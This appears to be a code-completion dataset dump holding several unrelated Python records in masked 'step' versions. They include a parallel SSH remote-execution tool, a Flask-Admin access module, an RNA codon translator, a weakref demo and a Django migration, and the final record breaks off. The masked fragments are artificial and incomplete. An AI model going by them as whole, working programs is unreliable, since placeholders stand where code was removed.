curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = ('/tmp/'+file,)
session.execute(('/bin/chmod a+x /tmp/'+file, ))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
# if output != None:
# print("Server {}".format(server))
# for key in output:
# print(key, output[key])
# pool = mp.Pool(processes=mp.cpu_count())
# result = pool.map_async(worker, servers)
# for item in result.get():
# print(json.dumps(item, indent=4))
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children() :
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print("Server: {} : Unable to ping".format(item['server']))
continue
if type(item['commands']) != type(dict()):
print("Server: {} : {}".format(item['server'], item['commands']))
continue
print("Server: {}".format(item['server']))
for command in commands:
if item['commands'][command][0] != "":
if options.script:
print("Output of Command: {}".format(options.script))
else:
print("Output of Command: {}".format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != "":
print("Error occurred on command: {}".format(command))
print(item['commands'][command][1])
print("**************************************************************************")
|
flexible
|
{
"blob_id": "ace7e5676fcb01c3542952eaacdada9963b8467a",
"index": 5168,
"step-1": "<mask token>\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\n<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\n<mask token>\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\n<mask token>\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\n<mask token>\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\n<mask token>\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\n<mask token>\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\n<mask token>\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description=\n 'Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\noptions = parser.parse_args()\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\ncommands = []\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\nqueue = mp.Queue()\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-4": "import sgc\nimport multiprocessing as mp\nimport argparse\nimport os\nimport re\nparser = argparse.ArgumentParser(description=\n 'Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\noptions = parser.parse_args()\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\ncommands = []\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\nqueue = mp.Queue()\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-5": "import sgc\nimport multiprocessing as mp\n# import json\nimport argparse\nimport os\nimport re\n\n\n\n#Process argument passed to the script\nparser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help='servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help='commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')\n\noptions = parser.parse_args()\n\n#Exit if input file is zero\nif os.path.getsize(options.file) == 0:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the input file and store the server in list variable servers\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\n\n#Exit the script if the servers list is empty\nif not servers:\n print(\"Error: server list file is empty\")\n exit(2)\n\n#Process the commands passed into the script\ncommands = []\n\nif options.commands and re.match(r'[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n #Exit the script if command list is empty\n if not commands:\n print(\"Error: command list is empty\")\n parser.print_help()\n exit(2)\n\nif options.script:\n commands = ['/tmp/'+os.path.basename(options.script)]\n\n#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',\n# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']\n# servers = ['centos6web', 'fedora.kannan.lab']\n# commands = ('sudo shutdown -h 0',)\n# commands = ('uptime', 'uname -a', 'sudo fdisk -l')\nqueue = mp.Queue()\ndef worker(server, commands):\n # print(mp.current_process().name)\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n\n # print(\"Connected to server {}\".format(server))\n # else:\n # print(\"Unable to connect to server {}\\n{}\".format(server, session.connection_error))\n if session.ping == 'Alive':\n session.connect()\n # print(session.connection)\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'] = \"Error: the script location {} not exists\".format(options.script)\n print(\"Error: the script location {} not exists\".format(options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = ('/tmp/'+file,)\n session.execute(('/bin/chmod a+x /tmp/'+file, ))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n\n queue.put(output)\n # if output != None:\n # print(\"Server {}\".format(server))\n # for key in output:\n # print(key, output[key])\n\n# pool = mp.Pool(processes=mp.cpu_count())\n# result = pool.map_async(worker, servers)\n# for item in result.get():\n# print(json.dumps(item, indent=4))\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n 
procs.append(proc)\n proc.start()\nwhile mp.active_children() :\n if not queue.empty():\n item = queue.get()\n\n if item['commands'] == 'Down':\n print(\"Server: {} : Unable to ping\".format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print(\"Server: {} : {}\".format(item['server'], item['commands']))\n continue\n\n print(\"Server: {}\".format(item['server']))\n for command in commands:\n if item['commands'][command][0] != \"\":\n if options.script:\n print(\"Output of Command: {}\".format(options.script))\n else:\n print(\"Output of Command: {}\".format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != \"\":\n print(\"Error occurred on command: {}\".format(command))\n print(item['commands'][command][1])\n print(\"**************************************************************************\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from flask_admin.contrib.sqla import ModelView
from flask_admin import Admin
from flask import abort
import flask_login
import logging
from .models import User, sendUserMail, db as userdb
from .box_models import Box, Image, db as boxdb
from .box_queue import BoxQueue
logger = logging.getLogger('labboxmain')
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, "Permission Denied")
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, "Permission Denied")
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ["id", "name", "disable", "groupid", "email", "passtime", "quota", "use_quota", "password"]
column_descriptions = {
'password': "Password(Left empty for forgot or newly create, It will send email to whom)",
'passtime': "The time for manually changing password(0 = never)"
}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning("[Admin] Create for " + model.email)
sendUserMail(model, "register")
return
if not model.password:
logger.warning("[Admin] Reset Password and sent to " + model.email)
sendUserMail(model, "forgetpass")
return
if not model.password.startswith("$6$"):
logger.warning("[Admin] Reset Password " + model.email)
model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
|
normal
|
{
"blob_id": "3f86227afd60be560ac3d4ce2bee1f6cf74a744d",
"index": 3509,
"step-1": "<mask token>\n\n\nclass UserModel(AuthModel):\n <mask token>\n <mask token>\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-3": "<mask token>\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-4": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-5": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\n\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, \"Permission Denied\")\n return False\n\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, \"Permission Denied\")\n return False\n\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = [\"id\", \"name\", \"disable\", \"groupid\", \"email\", \"passtime\", \"quota\", \"use_quota\", \"password\"]\n\n column_descriptions = {\n 'password': \"Password(Left empty for forgot or newly create, It will send email to whom)\",\n 'passtime': \"The time for manually changing password(0 = never)\"\n }\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning(\"[Admin] Create for \" + model.email)\n sendUserMail(model, \"register\")\n return\n if not model.password:\n logger.warning(\"[Admin] Reset Password and sent to \" + model.email)\n sendUserMail(model, \"forgetpass\")\n return\n if not model.password.startswith(\"$6$\"):\n logger.warning(\"[Admin] Reset Password \" + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-ids": [
2,
6,
7,
8,
9
]
}
|
[
2,
6,
7,
8,
9
] |
aminotable = [
['Ile' , 'AUU','AUC','AUA'], #0
['Leu' , 'CUU','CUC','CUA','CUG','UUA','UUG'], #1
['Val' , 'GUU','GUC','GUA','GUG'], #2
['Phe' , 'UUU','UUC'], #3
['Met' , 'AUG'], #4
['Cys' , 'UGU','UGC'], #5
['Ala' , 'GCU','GCC','GCA','GCG'], #6
['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], #7
['Pro' , 'CCU', 'CCC', 'CCA', 'CCG'], #8
['Thr' , 'ACU', 'ACC', 'ACA', 'ACG'], #9
['Ser' , 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], #10
['Tyr' , 'UAU', 'UAC'], #11
['Trp' , 'UGG'], #12
['Gln' , 'CAA', 'CAG'], #13
['Asn' , 'AAU', 'AAC'], #14
['His' , 'CAU', 'CAC'], #15
['Glu' , 'GAA', 'GAG'], #16
['Asp' , 'GAU', 'GAC'], #17
['Lys', 'AAA', 'AAG'], #18
['Arg' , 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], #19
['Stop' , 'UAA', 'UAG', 'UGA'], #20
]
sequence = input("\nEnter RNA Sequence : ")
print('Original sequence: ',sequence,'\n')
n = 0
seqlength = len(sequence)
print('Amino Sequence: ')
while (n < seqlength):
codon = sequence[n:n+3]
for amino in aminotable:
for i in range(len(amino) - 1):
match = amino[i+1]
if (codon == match) :
print(amino[0], end = '-')
break
n += 3
print('\n\n\nEnd of program')
|
normal
|
{
"blob_id": "d5a31e53444e2efa2eb972f1152b6d3e37d5ab79",
"index": 5321,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Original sequence: ', sequence, '\\n')\n<mask token>\nprint('Amino Sequence: ')\nwhile n < seqlength:\n codon = sequence[n:n + 3]\n for amino in aminotable:\n for i in range(len(amino) - 1):\n match = amino[i + 1]\n if codon == match:\n print(amino[0], end='-')\n break\n n += 3\nprint(\"\"\"\n\n\nEnd of program\"\"\")\n",
"step-3": "aminotable = [['Ile', 'AUU', 'AUC', 'AUA'], ['Leu', 'CUU', 'CUC', 'CUA',\n 'CUG', 'UUA', 'UUG'], ['Val', 'GUU', 'GUC', 'GUA', 'GUG'], ['Phe',\n 'UUU', 'UUC'], ['Met', 'AUG'], ['Cys', 'UGU', 'UGC'], ['Ala', 'GCU',\n 'GCC', 'GCA', 'GCG'], ['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], ['Pro',\n 'CCU', 'CCC', 'CCA', 'CCG'], ['Thr', 'ACU', 'ACC', 'ACA', 'ACG'], [\n 'Ser', 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], ['Tyr', 'UAU', 'UAC'],\n ['Trp', 'UGG'], ['Gln', 'CAA', 'CAG'], ['Asn', 'AAU', 'AAC'], ['His',\n 'CAU', 'CAC'], ['Glu', 'GAA', 'GAG'], ['Asp', 'GAU', 'GAC'], ['Lys',\n 'AAA', 'AAG'], ['Arg', 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], [\n 'Stop', 'UAA', 'UAG', 'UGA']]\nsequence = input(\"\"\"\nEnter RNA Sequence : \"\"\")\nprint('Original sequence: ', sequence, '\\n')\nn = 0\nseqlength = len(sequence)\nprint('Amino Sequence: ')\nwhile n < seqlength:\n codon = sequence[n:n + 3]\n for amino in aminotable:\n for i in range(len(amino) - 1):\n match = amino[i + 1]\n if codon == match:\n print(amino[0], end='-')\n break\n n += 3\nprint(\"\"\"\n\n\nEnd of program\"\"\")\n",
"step-4": "aminotable = [\r\n ['Ile' , 'AUU','AUC','AUA'], #0\r\n ['Leu' , 'CUU','CUC','CUA','CUG','UUA','UUG'], #1\r\n ['Val' , 'GUU','GUC','GUA','GUG'], #2\r\n ['Phe' , 'UUU','UUC'], #3\r\n ['Met' , 'AUG'], #4\r\n ['Cys' , 'UGU','UGC'], #5\r\n ['Ala' , 'GCU','GCC','GCA','GCG'], #6\r\n ['Gly', 'GGU', 'GGC', 'GGA', 'GGG'], #7\r\n ['Pro' , 'CCU', 'CCC', 'CCA', 'CCG'], #8\r\n ['Thr' , 'ACU', 'ACC', 'ACA', 'ACG'], #9\r\n ['Ser' , 'UCU', 'UCC', 'UCA', 'UCG', 'AGU', 'AGC'], #10\r\n ['Tyr' , 'UAU', 'UAC'], #11\r\n ['Trp' , 'UGG'], #12\r\n ['Gln' , 'CAA', 'CAG'], #13\r\n ['Asn' , 'AAU', 'AAC'], #14\r\n ['His' , 'CAU', 'CAC'], #15\r\n ['Glu' , 'GAA', 'GAG'], #16\r\n ['Asp' , 'GAU', 'GAC'], #17\r\n ['Lys', 'AAA', 'AAG'], #18\r\n ['Arg' , 'CGU', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'], #19\r\n ['Stop' , 'UAA', 'UAG', 'UGA'], #20\r\n]\r\n\r\nsequence = input(\"\\nEnter RNA Sequence : \")\r\n\r\nprint('Original sequence: ',sequence,'\\n')\r\n\r\nn = 0\r\nseqlength = len(sequence)\r\n\r\nprint('Amino Sequence: ')\r\n\r\nwhile (n < seqlength):\r\n codon = sequence[n:n+3]\r\n for amino in aminotable:\r\n for i in range(len(amino) - 1):\r\n match = amino[i+1]\r\n if (codon == match) :\r\n print(amino[0], end = '-')\r\n break\r\n n += 3\r\n\r\nprint('\\n\\n\\nEnd of program')\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from collections import namedtuple
from weakref import ref
l = list()
_l = list()
# Point = namedtuple('Point', ['x', 'y'])
class Point:
def __init__(self,x,y):
self.x = x
self.y = y
def callback(ref):
print ('__del__', ref)
for x in range(10):
p = Point(x,x**2)
t = ref(p,callback)
print(t)
l.append(t)
_l.append(p)
print(len(l),l)
print(len(_l),_l)
t = _l[6]
del t,_l[6]
print(len(_l),_l)
# print(len(l),l)
|
normal
|
{
"blob_id": "2542998c3a7decd6329856a31d8e9de56f82bae1",
"index": 3922,
"step-1": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\n<mask token>\n",
"step-3": "<mask token>\nl = list()\n_l = list()\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x, x ** 2)\n t = ref(p, callback)\n print(t)\n l.append(t)\n _l.append(p)\nprint(len(l), l)\nprint(len(_l), _l)\nt = _l[6]\ndel t, _l[6]\nprint(len(_l), _l)\n",
"step-4": "from collections import namedtuple\nfrom weakref import ref\nl = list()\n_l = list()\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x, x ** 2)\n t = ref(p, callback)\n print(t)\n l.append(t)\n _l.append(p)\nprint(len(l), l)\nprint(len(_l), _l)\nt = _l[6]\ndel t, _l[6]\nprint(len(_l), _l)\n",
"step-5": "from collections import namedtuple\nfrom weakref import ref\n\nl = list()\n_l = list()\n\n# Point = namedtuple('Point', ['x', 'y'])\nclass Point:\n def __init__(self,x,y):\n self.x = x\n self.y = y\n\n\ndef callback(ref):\n print ('__del__', ref)\n\n\nfor x in range(10):\n p = Point(x,x**2)\n t = ref(p,callback)\n print(t)\n l.append(t)\n _l.append(p)\n\nprint(len(l),l)\nprint(len(_l),_l)\n\nt = _l[6]\ndel t,_l[6]\n\nprint(len(_l),_l)\n\n\n# print(len(l),l)",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('blog', '0005_auto_20200111_1513')]
operations = [migrations.AlterField(model_name='post', name='photo',
field=models.TextField(default='https://medium.com/'))]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('blog', '0005_auto_20200111_1513')]
operations = [migrations.AlterField(model_name='post', name='photo',
field=models.TextField(default='https://medium.com/'))]
<|reserved_special_token_1|>
# Generated by Django 3.0.1 on 2020-01-11 09:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_auto_20200111_1513'),
]
operations = [
migrations.AlterField(
model_name='post',
name='photo',
field=models.TextField(default='https://medium.com/'),
),
]
|
flexible
|
{
"blob_id": "8e8c72362dfb1587150aadaa6b8a0aeb77c3641a",
"index": 1516,
"step-1": "<mask token>\n",
